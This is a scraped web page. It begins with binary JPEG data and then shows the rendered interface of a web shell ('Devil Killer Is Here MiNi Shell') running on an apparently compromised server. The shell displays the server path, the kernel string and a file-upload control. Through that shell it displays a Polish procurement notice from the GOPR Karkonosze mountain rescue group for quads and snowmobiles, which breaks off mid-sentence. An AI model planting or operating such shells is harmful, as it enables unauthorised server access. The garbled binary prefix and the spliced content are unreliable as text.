JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230913/0039530001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa specjalistycznych środków transportu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Grupa Regionalna Ochotniczego Pogotowia Ratunkowego GRUPA KARKONOSKA GOPR</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">GRUPA KARKONOSKA GOPR</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000844011</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sudecka 79</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75/75 24 734</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">75/75 24 734</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@goprkarkonosze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://gopr.org/news/przetargi</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Stowarzyszenie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa specjalistycznych środków transportu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-187bdd75-5231-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00395300</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-187bdd75-5231-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe minimalne wymagania<br/>techniczne dotyczące sprzętu używanego w celu korzystania z Platformy e-Zamówienia oraz informacje dotyczące specyfikacji<br/>połączenia, formatu przesyłu danych oraz kodowania i oznaczania czasu odbioru danych określa Regulamin Platformy e-<br/>Zamówienia, dostępny pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin/pl/regulamin/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej „RODO”), zamawiający informuje, iż administratorem danych osobowych jest:<br/>Naczelnik Grupy Regionalnej Górskiego Ochotniczego Pogotowia Ratunkowego - GRUPA KARKONOSKA GPOR, 58-500 Jelenia<br/>Góra, ul. Sudecka 79, nr tel./faksu: 75/75 24 734, e-mail: naczelnik@goprkarkonosze.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOPR.271.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I zamówienia obejmuje zadanie pod nazwą: <br/><br/>„Dostawa (2) dwóch QUADÓW DLA GK GOPR” <br/>o następujących parametrach technicznych: <br/><br/>Quad z fabryczną homologacją drogową dla dwóch osób na ciągnik rolniczy (T3b)<br/>SILNIK<br/>Typ – min. 59 kW (80KM), chłodzony cieczą<br/>Układ zasilania paliwem - System iTCTM (inteligentne sterowanie przepustnicą) z elektronicznym wtryskiem paliwa (EFI)<br/>Przekładnia – CVT, P/R/N/H/L, system hamowania silnikiem <br/>Napęd – do wyboru tryby 2WD/4WD/Lock 4WD z kontrolą trakcji (BTC)<br/>Wspomaganie kierownicy – Trzystopniowe wspomaganie kierownicy<br/><br/>ZAWIESZENIE <br/><br/>Zawieszenie przednie – Podwójne wahacze łukowe z zewnętrznym stabilizatorem poprzecznym/<br/>Amortyzatory przednie i tylne<br/>Zawieszenie tylne – Zawieszenie niezależne pływającoskrętne (TTI)<br/><br/>OPONY/FELGI<br/><br/>Opony o agresywnym bieżniku terenowym <br/><br/>Felgi aluminiowe<br/><br/>HAMULCE<br/>Przód – Podwójne hamulce tarczowe z dwutłoczkowymi zaciskami hydraulicznymi<br/>Tył - Pojedyncze hamulce tarczowe z dwutłoczkowymi zaciskami hydraulicznymi<br/>ABS , i inne systemy bezpieczeństwa dedykowane przez producenta. <br/><br/>WYMIARY/POJEMNOŚĆ <br/><br/>Masa – maksymalnie 410 kg<br/>Długość/szerokość/wysokość – maksymalnie 2,49 x 1,25 x 1,4m<br/>Rozstaw osi – minimalnie 147 cm maksymalnie 155 cm<br/>Prześwit – min. 27,0 cm<br/><br/>Nośność bagażnika– min przód 45kg/tył 90 kg<br/>Pojemność przestrzeni bagażowej – min. 20 l.<br/>Uciąg – 750kg przyczepa z hamulcami, 335kg przyczepa bez hamulców<br/>Pojemność zbiornika paliwa – min 20,0 l<br/><br/>FUNKCJE<br/>Kokpit - Wyświetlacz cyfrowy o przekątnej min 7,5 cala<br/>Oprzyrządowanie – gniazdo elektryczne, złącze min 15A<br/>Zapłon – System zabezpieczający kodowany cyfrowo<br/>Oświetlenie przednie reflektory LED<br/>Wyciągarka - Wyciągarka na linie miękkiej o uciągu min 1500kg<br/>Niezależne Siedzenia – kierowcy i pasażera z uchwytami bocznymi do trzymania się, łatwo demontowalne. <br/>Kierownica – aluminiowa kierownica z osłonami manetek, szyba z przodu demontowalna<br/>Bezpieczeństwo – Wytrzymałe zderzaki przednie i tylne, błotniki<br/>Szyba przednia średnia – łatwo demontowalna,<br/>Kierunkowskazy zamontowane tak, żeby nie przeszkadzały przy montażu napędu alternatywnego. <br/><br/>WYPOSARZENIE DODATKOWE<br/><br/>•	Głębokie kosze z przodu i z tyłu na pakunek wraz z siatkami zabezpieczającymi (mocującymi) – kosze dedykowane przez producenta min.15 cm maks, 17 cm wysokie<br/>•	Listwa oświetleniowa LED z przodu quada, stworzenie instalacji pod lampę. Lampa działająca niezależnie.<br/>•	Pałąk z tyłu i zamontowane oświetlenie LED (oświetlające tył - niezależnie od biegu wstecznego). Pałąk ma być łatwo demontowalny - rozwiązanie dedykowane do wytworzenia,produkcji- możliwość zaczepienia 2 par nart wraz z kijkami w układzie pionowym do pałąka oraz chrona pasażerów przed zgnieceniem w trakcie przewrócenia maszyny. <br/>•	Sygnalizacja świetlno dźwiękowa diodowa, z możliwością użycia samej sygnalizacji świetlnej oraz użycia samej syganlizacji dźwiękowej<br/>•	Hebel do akumulatora<br/>•	Wyprowadzenie od akumulatora przewodu do prostownika podtrzymującego <br/>•	Prostownik podtrzymujący dedykowany do quada<br/>•	Zaczep saniowy i kulowy / sugerowany uniwerslany <br/>•	Napęd alternatywny dedykowany przez producenta do quada wraz koniecznym oprzyrządowaniem (KIT) i tzw panelem sterującym, gdy jest zalecany przez producenta. <br/>•	Dostawca gwarantuje przeszkolenie na terenie GK GOPR z zakresu:<br/>- bieżącej eksplotacji pojazdu,<br/>- montażu i demontażu napędu alternatywnego.<br/>•	Dostawca zobowiązuje się do tzw serwisu &#34;zerowego&#34; przed dostarczeniem przedmiotu umowy, do siedziby Zamawiającego. <br/>•	W przypadku awarii quada, Dostawca w ciągu 48 godzin od dnia momentu zaistnienia awarii (licząc dni powszednie), jest zobowiązany przez okres trwania gwarancji do niezwłocznego przyjęcia quada przez AUTORYZOWANY PUNKT SERWISOWY.<br/>•	W przypadku wymaganego serwisu przez Producenta, Dostawca zobowiązany jest do zrobienia danych czynności w ciągu 10 dni powszedni od terminu zgłoszenia przez Zamawiającego .<br/>•	Zamawiający jest w stanie dostarczyć przedmiot umowy do AUTORYZOWANEGO PUNKTU SERWISOWEGO, gdy jego odległość nie przekracza 130 km od siedziby Zamawiającego. W innym przypadku logistyka transportu jest po stronie Dostawcy.<br/>•	Koszty transportu w przypadku wad produkcyjnych, spraw związanych z gwarancją pokrywa Dostawca.<br/>•	W przypadku serwisu przedmiotu umowy, przekraczającej 5 dni roboczych, Dostawca zobowiązany jest dostarczyć pojazd zastępczy, tej samej klasy. <br/>•	Okres gwarancji i trwania umowy – min. 24 miesiące. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34000000-7 - Sprzęt transportowy i produkty pomocnicze dla transportu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty zostanie dokonany w oparciu o następujące kryteria:<br/><br/>Dla części I, II, III, IV zamówienia:<br/><br/>1. cena brutto przedmiotu zamówienia – waga 60 %<br/><br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły:<br/><br/> Pc <br/><br/>Pc – ilość punktów ofert badanej w kryterium cena,<br/>ano – najniższa cena brutto ze wszystkich ważnych ofert,<br/>ank – cena brutto badanej oferty,<br/><br/>2. Termin wykonania zamówienia – waga 40%<br/><br/>Termin wykonania zamówienia (Pt) – waga 40%<br/><br/>Punkty za kryterium „termin wykonania zamówienia” zostanie przyznane w skali punktowej do 40 punktów. Ilość punktów w tym kryterium przyznana zostanie według poniższej formuły:<br/><br/>Zamawiający wymaga wykonanie części I, II, III, IV zamówienia w terminie do dnia 30.11.2023 r. od dnia zawarcia umowy.<br/>Wykonawcy otrzymają dodatkowe punkty w tym kryterium oceny ofert w przypadku zaoferowania krótszego terminu wykonania zamówienia tj.:<br/>Wykonanie zamówienia w terminie do dnia 24.11.2023 r. od dnia zawarcia umowy – 20,00 pkt;<br/>Wykonanie zamówienia w terminie do 10.11.2023 r. od dnia zawarcia umowy – 40,00 pkt;<br/><br/>Oferta o terminie wykonania zamówienia krótszym niż do dnia 10.11.2023 r. od dnia zawarcia umowy otrzyma 40,00 pkt<br/><br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru:<br/><br/>P = Pc+ Pt<br/><br/>P- łączna ilość punktów badanej oferty<br/>Pc – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34;<br/>Pt – ilość punktów badanej oferty w kryterium oceny &#34;termin wykonania zamówienia&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II zamówienia obejmuje zadanie pod nazwą: <br/><br/>„Dostawa (2) dwóch SKUTERÓW ŚNIEŻNYCH DLA GK GOPR” <br/>o następujących parametrach technicznych: <br/><br/>SILNIK <br/>Szczegóły:<br/> silnika chłodzony cieczą, czterosuwowy <br/>Cylindry 2<br/>Pojemność skokowa w zakresie od 600 cm3 do 700 cm3<br/><br/>Nawęglanie EFI<br/>Zalecany rodzaj paliwa Benzyna bezołowiowa<br/>Minimalna liczba oktanowa 95<br/>Zbiornik paliwa min. 42 litry<br/><br/>UKŁAD NAPĘDOWY<br/>Skrzynia biegów 2F/N/R z przyciskiem cofania<br/>Sprzęgło napędowe typu eDrive II<br/>Napędzane sprzęgło typu QRS<br/><br/>Układ hamulcowy :<br/>Hamulec hydrauliczny z przewodem hamulcowym w stalowym oplocie, plastikowy cylinder główny<br/><br/>WYMIARY<br/>Długość całkowita pojazdu min. 3180 mm max. 3245 mm, <br/>Szerokość całkowita pojazdu bez dodatkowego wyposażenia: między 1200 mm a 1350 mm<br/>Całkowita wysokość pojazdu bez dodatkowego wyposażenia: między 1300 mm a 1500 mm<br/>Rozstaw nart między 950 mm a 1005 mm<br/>Szerokość nominalna gasięnicy między 500 m a 550 mm<br/>Długość nominalna gąsienicy między 3900 mm a 4000 mm<br/>Wysokość profilu gasięnicy pomiedzy 42 mm a 46 mm<br/><br/>ZAWIESZENIE – <br/>Zawieszenie tylne przegubowe, z regulowanymi amortyzatorami,<br/>Zawieszenie przednie LFS, amortyzatory MC<br/><br/>OŚWIETLENIE:<br/>LAMPY FABRYCZNE LUB DEDYKOWANE PRZEZ PRODUCENTA WRAZ Z INSTALACJĄ: <br/>•	przy włączeniu biegu wstecznego sygnalizacja za pomocą białej lampki.<br/>•	Hamulec zespolony z lampką czerwoną STOP,<br/>•	Światła długie i krótkie białe przód, lampka czerwona tył, w kloszu zespolona lampa stop. <br/><br/>WYPOSARZENIE DODATKOWE<br/>•	kanapa dwuosobowa z oparciem i uchwytami bocznymi dla pasażera<br/>•	fabryczna szyba przednia i lusterka boczne, <br/>•	sygnalizacja świetlno-dźwiękowa,oparta na lampa LED z możliwością włączenia również samej sygnalizacji świetlnej lub dźwiękowej. Jedna lampa sygnalizacyjna typu LED na umiejscowiona na pałąku bezpieczeństwa ujętym poniżej). <br/>•	hebel do akumulatora,<br/>•	prostownik podtrzymujący, wyjście z akumulatora do prostownika. <br/>•	pałąk bezpieczeństwa na górze z oświetleniem roboczym (listwy LED przód, tył) niezależnie włączane. <br/>•	mocowanie na 2 pary nart montowane do skrzyni, pałąk (ew. inny montaż) w układzie pionowym <br/>•	skrzynia na bagaże, wysokości min 40 cm z siatką mocującą.<br/>•	zaczep saniowy<br/>•	hamulec postojowy, tzw łapy<br/>•	Dostawca gwarantuje przeszkolenie na terenie GK GOPR z zakresu:<br/>- bieżącej eksplotacji pojazdu,<br/>•	Dostawca zobowiązuje się do tzw serwisu &#34;zerowego&#34; przed dostarczeniem przedmiotu umowy, do siedziby Zamawiającego. <br/>•	W przypadku awarii przedmiotu umowy, Dostawca w ciągu 48 godzin od dnia momentu zaistnienia awarii (licząc dni powszednie), jest zobowiązany przez okres trwania gwarancji do niezwłocznego przyjęcia quada przez AUTORYZOWANY PUNKT SERWISOWY.<br/>•	W przypadku wymaganego serwisu przez Producenta, Dostawca zobowiązany jest do zrobienia danych czynności w ciągu 10 dni powszednich od terminu zgłoszenia przez Zamawiającego .<br/>•	Zamawiający jest w stanie dostarczyć przedmiot umowy do AUTORYZOWANEGO PUNKTU SERWISOWEGO, gdy jego odległość nie przekracza 130 km od siedziby Zamawiającego. W innym przypadku logistyka transportu jest po stronie Dostawcy.<br/>•	Koszty transportu w przypadku wad produkcyjnych, spraw związanych z gwarancją pokrywa Dostawca.<br/>•	W przypadku serwisu przedmiotu umowy, przekraczającej 5 dni roboczych, Dostawca zobowiązany jest dostarczyć pojazd zastępczy, tej samej klasy. <br/>•	Okres gwarancji i trwania umowy – min. 24 miesiące. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34000000-7 - Sprzęt transportowy i produkty pomocnicze dla transportu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34421000-7 - Skutery silnikowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty zostanie dokonany w oparciu o następujące kryteria:<br/><br/>Dla części I, II, III, IV zamówienia:<br/><br/>1. cena brutto przedmiotu zamówienia – waga 60 %<br/><br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły:<br/><br/> Pc <br/><br/>Pc – ilość punktów ofert badanej w kryterium cena,<br/>ano – najniższa cena brutto ze wszystkich ważnych ofert,<br/>ank – cena brutto badanej oferty,<br/><br/>2. Termin wykonania zamówienia – waga 40%<br/><br/>Termin wykonania zamówienia (Pt) – waga 40%<br/><br/>Punkty za kryterium „termin wykonania zamówienia” zostanie przyznane w skali punktowej do 40 punktów. Ilość punktów w tym kryterium przyznana zostanie według poniższej formuły:<br/><br/>Zamawiający wymaga wykonanie części I, II, III, IV zamówienia w terminie do dnia 30.11.2023 r. od dnia zawarcia umowy.<br/>Wykonawcy otrzymają dodatkowe punkty w tym kryterium oceny ofert w przypadku zaoferowania krótszego terminu wykonania zamówienia tj.:<br/>Wykonanie zamówienia w terminie do dnia 24.11.2023 r. od dnia zawarcia umowy – 20,00 pkt;<br/>Wykonanie zamówienia w terminie do 10.11.2023 r. od dnia zawarcia umowy – 40,00 pkt;<br/><br/>Oferta o terminie wykonania zamówienia krótszym niż do dnia 10.11.2023 r. od dnia zawarcia umowy otrzyma 40,00 pkt<br/><br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru:<br/><br/>P = Pc+ Pt<br/><br/>P- łączna ilość punktów badanej oferty<br/>Pc – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34;<br/>Pt – ilość punktów badanej oferty w kryterium oceny &#34;termin wykonania zamówienia&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości 